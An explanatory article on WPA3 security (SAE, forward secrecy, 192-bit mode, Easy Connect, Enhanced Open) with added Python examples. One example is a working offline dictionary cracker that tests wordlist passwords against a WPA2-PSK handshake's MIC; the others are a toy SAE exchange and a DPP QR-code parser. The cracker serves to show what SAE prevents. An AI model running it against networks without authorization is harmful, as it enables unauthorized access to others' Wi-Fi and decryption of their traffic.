The Wi-Fi Alliance recently announced the biggest Wi-Fi security upgrade in 14 years. The Wi-Fi Protected Access 3 (WPA3) security certification delivers some urgently needed updates to WPA2, which launched in 2004. WPA3 does not transform Wi-Fi security wholesale; it concentrates on new mechanisms that address the weaknesses that have surfaced in WPA2.
Alongside WPA3, the Wi-Fi Alliance also announced two independent certification programs: Enhanced Open and Easy Connect. Neither depends on WPA3, but both improve security for particular kinds of networks and particular situations.
All of these protocols are now available for manufacturers to build into their devices. If WPA2 is ever to leave the stage, these protocols will eventually have to be adopted universally, but the Wi-Fi Alliance has set no timetable. Most likely, as new devices reach the market, there will be a turning point after which WPA3, Enhanced Open and Easy Connect are simply the mainstream.
So what do these new protocols actually do? Most of them concern wireless encryption, and there is a fair amount of mathematics behind them, so the full story is long. This article covers only the four main changes they bring to wireless security.
Simultaneous Authentication of Equals (SAE)
This is the biggest change WPA3 brings. The most important moment in any network defense is when a new device or user tries to connect. It is safest to keep an adversary outside the door, which is why both WPA2 and now WPA3 put so much emphasis on authenticating new connections and making sure they are not an attacker's attempt to get in.
SAE is a new method of authenticating a device that is trying to join the network. It is a variant of the Dragonfly handshake, a password-authenticated key exchange that uses cryptography to stop an eavesdropper from testing password guesses against the traffic it has recorded. It specifies exactly how a new device or user and the router greet each other and exchange keying material.
SAE replaces the way the pre-shared key (PSK) has been used since WPA2 launched in 2004. In WPA2-Personal the PSK, derived directly from the Wi-Fi password, feeds the four-way handshake: four messages between the router and the connecting device in which each side proves it knows the password without either side ever transmitting it. PSK looked safe until the Key Reinstallation Attack (KRACK) was disclosed in 2017.
KRACK interferes with the four-way handshake by blocking and replaying its messages so that the connecting device reinstalls an encryption key it is already using, which resets the nonces and lets the attacker decrypt or forge frames. It does not recover the password, and because WPA3 still runs a four-way handshake after SAE, the key-reinstallation flaw was fixed by patching device software rather than by SAE itself. What SAE does defeat is the more common offline dictionary attack. In an offline dictionary attack, a computer tries hundreds, thousands or millions of passwords against the authentication data captured from a PSK handshake until one of them matches, without ever touching the network again.
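The offline dictionary attack just described, written out as an added example; this is not code from the original article or from any Wi-Fi Alliance specification. It implements the WPA2-Personal key schedule (PBKDF2 from passphrase and SSID to the PMK, the 802.11 PRF to the PTK, and the EAPOL-Key MIC) and then checks a wordlist against a handshake. The handshake, MAC addresses, nonces and EAPOL frame body are constructed inside the file rather than taken from a capture, and the SSID, passphrase and wordlist are assumptions:

```python
"""Offline dictionary attack on a WPA2-PSK four-way handshake (added example).

Everything the attacker needs is passively captured: SSID, both MAC addresses, both
nonces, the second EAPOL-Key frame and its MIC. Each guess is then checked offline.
The handshake below is CONSTRUCTED in this file, not taken from a real capture.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """IEEE 802.11: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Its first 128 bits are the Key Confirmation Key (KCK) that protects the MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2, AES-CCMP): MIC = HMAC-SHA1(KCK, frame)[:16],
    computed over the frame with its 16-byte MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack(handshake, wordlist):
    """Try each candidate passphrase against the captured MIC. No network access is
    needed: the cost per guess is one PBKDF2 (4096 HMAC-SHA1) plus a few more HMACs."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, handshake["ssid"])
        kck = derive_kck(pmk, handshake["aa"], handshake["spa"],
                         handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return word
    return None


def constructed_handshake(passphrase=b"Tr0ub4dor&3", ssid=b"HomeNet"):
    """Build a handshake the way a real AP and station would, so crack() has a target.
    MACs, nonces and the EAPOL frame body are constructed placeholders."""
    aa = bytes.fromhex("001122334455")     # authenticator (AP) MAC, constructed
    spa = bytes.fromhex("66778899aabb")    # supplicant (station) MAC, constructed
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    # EAPOL-Key message 2 with the MIC field zeroed: version 1, type 3 (Key), body
    # length 117, descriptor type 2 (RSN), Key Info 0x010a (MIC, Pairwise, version 2).
    eapol = b"\x01\x03\x00\x75" + b"\x02\x01\x0a\x00" + bytes(113)
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(kck, eapol)}


if __name__ == "__main__":
    hs = constructed_handshake()
    print("recovered passphrase:", crack(hs, [b"password", b"letmein", b"Tr0ub4dor&3"]))
```

Every field in `handshake` is visible to anyone who records the four frames, so the only per-guess cost is the PBKDF2, which dedicated hardware performs at very high rates. That is precisely what SAE removes: an SAE transcript contains no value that a password guess can be checked against.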
As the name suggests, SAE treats the two devices as equals rather than as a requester and an authenticator (traditionally the connecting device and the router). Either side can start the handshake, and each sends a commit message built from its own random values and the password, followed by a confirm message, instead of answering a challenge in a fixed back-and-forth. Nothing in the exchanged commit values lets a passive observer check a password guess afterwards; every guess requires a fresh, live exchange with the network, which the access point can rate-limit, so dictionary attacks become impractical.
SAE also provides a security property that PSK lacks: forward secrecy. Suppose an attacker records the encrypted traffic passing between the router and its clients. With WPA2-PSK the attacker can keep that data and, on later learning the password, decrypt everything recorded. With SAE, the session key is derived from fresh random values at every connection, so learning the password later reveals nothing about past sessions. The caveat is that forward secrecy protects recorded traffic only: an attacker who knows the password can still join the network or impersonate the access point from then on.
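The commit-and-confirm exchange, with both sides run in one process, as an added example; it is neither the original article's code nor an implementation taken from IEEE 802.11. It follows the finite-field form of Dragonfly but with a freshly generated 64-bit group, a shortened hunting-and-pecking step and HMAC-SHA256 in place of the standard's KDF, all simplifications chosen to keep it within the standard library; the MAC addresses and passwords are likewise made up:

```python
"""Toy Simultaneous Authentication of Equals (Dragonfly) over a finite-field group.
Added example, not WPA3 reference code. Simplified: 64-bit safe-prime group (real SAE
uses 2048-bit-or-larger MODP groups or P-256), short hunting-and-pecking, HMAC-SHA256 KDF.
"""
import hashlib
import hmac
import secrets

def is_probable_prime(n, rounds=24):
    """Miller-Rabin with random bases; adequate for a demo-sized group."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def safe_prime_group(bits=64):
    """(p, q) with p = 2q + 1 both prime: the squares mod p form a group of prime order q."""
    while True:
        q = secrets.randbits(bits - 1) | (1 << (bits - 2)) | 1
        if is_probable_prime(q) and is_probable_prime(2 * q + 1):
            return 2 * q + 1, q

def to_bytes(v, modulus):
    return v.to_bytes((modulus.bit_length() + 7) // 8, "big")

def password_element(p, q, addr_a, addr_b, password):
    """Hunting and pecking (simplified): hash password with both MACs and a counter, raise
    the result to (p-1)/q so it lands in the order-q subgroup, accept the first PE > 1."""
    hi, lo = max(addr_a, addr_b), min(addr_a, addr_b)
    for counter in range(1, 256):
        seed = hmac.new(hi + lo, password + bytes([counter]), hashlib.sha256).digest()
        pe = pow(int.from_bytes(seed, "big") % p, (p - 1) // q, p)
        if pe > 1:
            return pe
    raise RuntimeError("no password element found")

def commit(p, q, pe):
    """Commit: scalar = rand + mask (mod q), element = PE^-mask; rand and mask stay private."""
    while True:
        rand, mask = secrets.randbelow(q - 2) + 2, secrets.randbelow(q - 2) + 2
        scalar = (rand + mask) % q
        if scalar >= 2:
            return rand, scalar, pow(pe, q - mask, p)   # PE^(-mask), since PE^q == 1

def shared_secret(p, pe, rand, peer_scalar, peer_element):
    """K = (PE^peer_scalar * peer_element)^rand = PE^(rand * peer_rand); masks cancel only
    if both PEs came from the same password."""
    return pow(pow(pe, peer_scalar, p) * peer_element % p, rand, p)

def derive_keys(p, q, k, scalar_a, scalar_b):
    """KCK authenticates the confirm messages; PMK feeds the later four-way handshake."""
    keyseed = hashlib.sha256(to_bytes(k, p)).digest()
    ctx = to_bytes((scalar_a + scalar_b) % q, q)
    kck = hmac.new(keyseed, b"SAE KCK" + ctx, hashlib.sha256).digest()
    pmk = hmac.new(keyseed, b"SAE PMK" + ctx, hashlib.sha256).digest()
    return kck, pmk

def confirm_tag(p, kck, send_confirm, own_scalar, own_elem, peer_scalar, peer_elem):
    """Confirm message: MAC over the send-confirm counter and both commit messages."""
    body = b"".join(to_bytes(v, p) for v in (own_scalar, own_elem, peer_scalar, peer_elem))
    return hmac.new(kck, send_confirm.to_bytes(2, "big") + body, hashlib.sha256).digest()

def sae_session(p, q, ap_password, sta_password,
                ap=bytes.fromhex("020000000001"), sta=bytes.fromhex("020000000002")):
    """Run both sides in one process. Returns (AP's PMK, station's PMK, both confirms OK)."""
    pe_ap = password_element(p, q, ap, sta, ap_password)
    pe_sta = password_element(p, q, ap, sta, sta_password)
    rand_ap, sc_ap, el_ap = commit(p, q, pe_ap)        # AP -> STA; either side may go first
    rand_sta, sc_sta, el_sta = commit(p, q, pe_sta)    # STA -> AP
    kck_ap, pmk_ap = derive_keys(p, q, shared_secret(p, pe_ap, rand_ap, sc_sta, el_sta), sc_ap, sc_sta)
    kck_sta, pmk_sta = derive_keys(p, q, shared_secret(p, pe_sta, rand_sta, sc_ap, el_ap), sc_ap, sc_sta)
    tag_ap = confirm_tag(p, kck_ap, 1, sc_ap, el_ap, sc_sta, el_sta)     # AP -> STA
    tag_sta = confirm_tag(p, kck_sta, 1, sc_sta, el_sta, sc_ap, el_ap)   # STA -> AP
    sta_ok = hmac.compare_digest(tag_ap, confirm_tag(p, kck_sta, 1, sc_ap, el_ap, sc_sta, el_sta))
    ap_ok = hmac.compare_digest(tag_sta, confirm_tag(p, kck_ap, 1, sc_sta, el_sta, sc_ap, el_ap))
    return pmk_ap, pmk_sta, ap_ok and sta_ok

if __name__ == "__main__":
    p, q = safe_prime_group()
    pmk_a, pmk_b, ok = sae_session(p, q, b"correct horse", b"correct horse")
    pmk_c, _, _ = sae_session(p, q, b"correct horse", b"correct horse")
    _, _, bad = sae_session(p, q, b"correct horse", b"wrong horse")
    print("same password -> keys agree:", ok and pmk_a == pmk_b)
    print("second session -> fresh PMK (forward secrecy):", pmk_a != pmk_c)
    print("wrong password -> confirm fails:", not bad)
```

The three printed lines are the properties the text describes: equal passwords yield the same PMK on both sides, a second session with the same password yields a different PMK, and a mismatched password makes the confirm step fail. A passive observer sees only scalars, elements and confirm tags; without one side's private `rand` there is nothing to check a password guess against, so each guess costs a live exchange that the access point can throttle.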
SAE is defined in IEEE 802.11-2016 (it first appeared in the 802.11s mesh amendment). Incidentally, that standard runs to more than 3,500 pages.
192-bit security suite
WPA3-Enterprise is the WPA3 certification aimed at financial institutions, governments and enterprises, and it offers an optional 192-bit security mode. For a home router this is overkill, but for networks that handle especially sensitive information it makes sense.
Wi-Fi today provides 128-bit security (WPA2 with AES-CCMP-128). The 192-bit mode is not mandatory; it is an optional setting for organizations that want or need it. The Wi-Fi Alliance's point is that an enterprise network's cryptography must be consistently strong throughout: a system is only as secure as its weakest link.
To keep that consistency from end to end, WPA3-Enterprise 192-bit mode uses 256-bit Galois/Counter Mode Protocol (GCMP-256) for encryption, 384-bit Hashed Message Authentication Code (HMAC-SHA-384) for key derivation and confirmation, and Elliptic Curve Diffie-Hellman (ECDH) key exchange together with the Elliptic Curve Digital Signature Algorithm (ECDSA), both on a 384-bit curve, for key establishment and authentication. The mathematics is involved, but the result is that every step of the process maintains at least 192 bits of security for the organizations that need it.
Easy Connect
Easy Connect is a response to the sheer number of connected devices in the world today. Not everyone has joined the smart-home trend, but compared with 2004 the average person has at least a few more devices connected to the home router. The Wi-Fi Alliance wants connecting all of them to be more intuitive. Rather than typing a password into every device you add to the network, each device carries a unique QR code that encodes its public key. To add a device, you scan its QR code with a smartphone that is already on the network.
Once the code is scanned, the network and the device exchange and verify keys for the subsequent connection. Easy Connect is a protocol separate from WPA3: an Easy Connect certified device must be WPA2 certified, but it need not be WPA3 certified.
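What the QR code actually carries, as an added example (not Wi-Fi Alliance or hostapd code): a parser for the Device Provisioning Protocol bootstrapping URI, whose K attribute is the device's public bootstrapping key as a base64 DER SubjectPublicKeyInfo holding a compressed P-256 point. The attribute letters and layout are assumed from the DPP specification; the sample URI and its key bytes are constructed, the point is not on the curve, and only the DER structure is checked (point validation would need an EC library):

```python
"""Parse a Wi-Fi Easy Connect (DPP) bootstrapping URI, the payload a device's QR code
carries. Added example, not Wi-Fi Alliance code. Assumed format (from the DPP spec):
"DPP:" then ';'-separated "X:value" attributes, terminated by ";;". C = operating
class/channel list, M = MAC address, I = information string, K = base64 DER
SubjectPublicKeyInfo with a compressed P-256 point. Sample key below is CONSTRUCTED.
"""
import base64
import hashlib

ID_EC_PUBLIC_KEY = bytes.fromhex("2a8648ce3d0201")   # OID 1.2.840.10045.2.1
PRIME256V1 = bytes.fromhex("2a8648ce3d030107")       # OID 1.2.840.10045.3.1.7 (P-256)


def der_tlv(buf, pos):
    """Read one DER tag-length-value; returns (tag, value, position after it)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                   # long-form length
        n = length & 0x7f
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated DER")
    return tag, buf[pos:pos + length], pos + length


def parse_bootstrap_key(der):
    """SubjectPublicKeyInfo -> 33-byte compressed P-256 point. Rejects other curves and
    uncompressed points; structure only, the point itself is not validated."""
    tag, spki, end = der_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("SPKI: expected a single SEQUENCE")
    tag, algid, pos = der_tlv(spki, 0)
    if tag != 0x30:
        raise ValueError("SPKI: missing AlgorithmIdentifier")
    t1, oid1, next_pos = der_tlv(algid, 0)
    t2, oid2, _ = der_tlv(algid, next_pos)
    if (t1, oid1, t2, oid2) != (0x06, ID_EC_PUBLIC_KEY, 0x06, PRIME256V1):
        raise ValueError("not an id-ecPublicKey on P-256")
    tag, bits, _ = der_tlv(spki, pos)
    if tag != 0x03 or not bits or bits[0] != 0:        # first octet: unused bits, must be 0
        raise ValueError("SPKI: malformed BIT STRING")
    point = bits[1:]
    if len(point) != 33 or point[0] not in (0x02, 0x03):
        raise ValueError("expected a compressed P-256 point")
    return point


def parse_dpp_uri(uri):
    """Return what a configurator learns from scanning the device's QR code."""
    if not uri.startswith("DPP:") or not uri.endswith(";;"):
        raise ValueError("not a DPP bootstrapping URI")
    attrs = {}
    for item in uri[4:-2].split(";"):
        key, sep, value = item.partition(":")
        if not sep or key in attrs:
            raise ValueError("malformed or duplicate attribute: %r" % item)
        attrs[key] = value
    if "K" not in attrs:
        raise ValueError("public bootstrapping key (K) is mandatory")
    info = {"pubkey": parse_bootstrap_key(base64.b64decode(attrs["K"], validate=True))}
    if "M" in attrs:
        mac = attrs["M"]
        if len(mac) != 12 or any(c not in "0123456789abcdefABCDEF" for c in mac):
            raise ValueError("M must be 12 hex digits")
        info["mac"] = ":".join(mac[i:i + 2].lower() for i in range(0, 12, 2))
    if "C" in attrs:
        channels = []
        for pair in attrs["C"].split(","):
            op_class, sep, chan = pair.partition("/")
            if not sep:
                raise ValueError("C entries are opclass/channel")
            channels.append((int(op_class), int(chan)))
        info["channels"] = channels
    if "I" in attrs:
        info["info"] = attrs["I"]
    return info


# Constructed sample: DER header of an id-ecPublicKey/P-256 SPKI with a compressed point,
# followed by a made-up 32-byte x coordinate (NOT on the curve).
_DER_HEADER = bytes.fromhex("3039301306072a8648ce3d020106082a8648ce3d030107032200")
SAMPLE_KEY_DER = _DER_HEADER + b"\x03" + hashlib.sha256(b"constructed x coordinate").digest()
SAMPLE_URI = ("DPP:C:81/1,115/36;M:AABBCCDDEEFF;I:constructed-sample;K:"
              + base64.b64encode(SAMPLE_KEY_DER).decode() + ";;")

if __name__ == "__main__":
    print(parse_dpp_uri(SAMPLE_URI))
```

The key is the security-relevant part: the configurator trusts the device it is about to provision because it read that public key off the device's own label, and the subsequent DPP authentication is bound to it. Channel and MAC hints only tell the configurator where to find the device.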
Enhanced Open
Enhanced Open is the other separate protocol, and it is designed to protect you on open networks. Open networks, the ones you connect to at coffee shops and airports, bring a set of problems that you usually do not have to worry about on a home or office network.
Many attacks on open networks are passive. With so many people connected, an attacker can collect a great deal of data simply by sitting there and sifting through the traffic.
Enhanced Open uses Opportunistic Wireless Encryption (OWE), defined in IETF RFC 8110, to defeat this passive eavesdropping. OWE adds no authentication; it concentrates on encrypting the data sent over a public network so that an eavesdropper cannot read it. Each client negotiates its own key with the access point through an unauthenticated Diffie-Hellman exchange during association, so other users of the same network cannot read its traffic either. OWE also blocks simple packet injection, in which an attacker disrupts the network by crafting and transmitting packets that look like part of its normal operation.
Enhanced Open provides no authentication because of the nature of open networks: by design, anyone may use them. It aims to harden open networks against passive attacks without asking ordinary users to enter a password or take any extra step. The flip side is that an active attacker who sets up a look-alike access point can still place itself in the middle of the connection, because the client has no way to tell the real network from a fake one.
Even after Easy Connect and Enhanced Open become the norm, it will probably be a few years before WPA3 is widespread. Adoption will happen as routers are replaced or upgraded. If you are worried about the security of your personal network, you should be able to replace your current router with a WPA3 certified one, since manufacturers will start selling them in the next few months.